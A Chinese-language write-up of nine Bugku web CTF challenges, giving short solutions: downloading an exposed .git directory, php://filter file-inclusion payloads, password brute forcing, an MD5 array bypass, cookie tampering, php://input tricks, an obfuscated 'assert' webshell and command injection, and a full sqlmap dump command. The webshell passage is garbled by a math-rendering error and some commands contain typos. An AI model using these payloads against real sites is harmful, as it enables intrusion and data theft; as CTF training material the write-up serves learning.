第一题 source
这题描述: 我哥说渗透我只用linux环境,flag在源码,抓包都没有发现,查看提示隐藏在.git目录下。
.git文件是开发人员在开发过程中使用 Git (分布式版本控制系统)做开发时产生的隐藏目录,该文件包含一些版本信息和网站源码,数据库信息等敏感信息。
- 使用dirsearch.py脚本扫描发现.git目录
- 使用命令下载wget -r http://114.67.246.176:14508/.git文件
- (-r是表示递归的意思,就是把这个路径下所有的文件都给下载下来)
- 在所在下载文件目录下命令操作git reflog
- 依次查看修改日志git show 文件名得到flag
第二题 文件包含
根据提示操作发现url上出现?file=show.php,file=XXX.php,优先考虑文件包含
使用PHP伪协议,php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会以base64读取文件输出
?file=php://filter/resource=xxx.php
通常获取源代码时,伪协议将xxx.php当文件执行,
使得很多信息往往不能直接显示在浏览器页面上,通常使用base64编码后再显示
构造URL?file=php://filter/read=convert.base64-encode/resource=index.php
得到一串base64加密字符串,解密得到flag
第三题 好像需要密码
提示五位数字密码,直接burp数字爆破,线程调200,爆破得到密码,得到flag
第四题 备份是个好习惯
备份想到.bak,进去得到提示base64解密
<?php
include_once "flag.php"; //包含 flag.php 文件
ini_set("display_errors", 0); //设置不返回错误信息
$str = strstr($_SERVER['REQUEST_URI'], '?');//判断URL里是否有问号,存在就返回给 $str
$str = substr($str,1); //获取 ? 后面的值
$str = str_replace('key','',$str); //将 $str 里面的 key 替换为空
parse_str($str);//解析字符串echo md5($key1); //将 key1 进行 MD5 加密并输出
echo md5($key2); //将 key2 进行 MD5 加密并输出
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag"; //如果 key1 和 key2 的值不相等,但是两个的 MD5 相等,就返回 flag
}
?>
构造?kekeyy1[]=1&kekeyy1[]=2&kekeyy2[]=1&kekeyy2[]=2得到flag
第五题 COOKIES
观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt
尝试用 filename访问index.php(原url使用base64,这也将index.php进行编码),line参数应该是行数,试一下 line=1,2,3,4…
得到
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ //重要
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
最后发现判断cookie必须满足margin=margin才能访问keys.php,抓包改cookie得到flag
第六题 never_give_up
burp抓包发现源码
";if(!$_GET['id'])
{
header('Location: hello.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'no no no no no no no';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
$flag = "flag{***********}"
}
else
{
print "never never never give up !!!";
}
$a不能有.
$a是路径
$id = 0
$b长度大于5,以4开头
- 抓包
- 构造URL?id=0xss&a=php://input&b=%00120345
- post传参bugku is a nice plateform!
- 得到flag
第七题 SHELL
根据描述:送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; KaTeX parse error: Expected 'EOF', got '#' at position 16: poc_1=explode("#̲",poc);
p
o
c
2
=
poc_2=
poc2=poc_1[0].
p
o
c
1
[
1
]
.
poc_1[1].
poc1[1].poc_1[2].
p
o
c
1
[
3
]
.
poc_1[3].
poc1[3].poc_1[4].$poc_1[5];
p
o
c
2
(
poc_2(
poc2(_GET[‘s’])
得到poc=assert
assert 断言函数
编写程序时,常会做出一定的假设,那断言就是用来捕获假设的异常,我们也可以认为断言是异常的一种特殊形式。
断言一般用于程序执行结构的判断,不可让断言处理业务流程。用的最多的场景就是单元测试,一般的单元测试框架都采用了断言。
根据描述是S=XXX
构造URL ?s=sytem(“ls”)得到flag
第八题 成绩查询
使用sqlmap注入
sqlmap -r http:// --dbs --tables --volumes --dump --passwords --users
得到flag
第九题 秋名山车神
编写脚本提交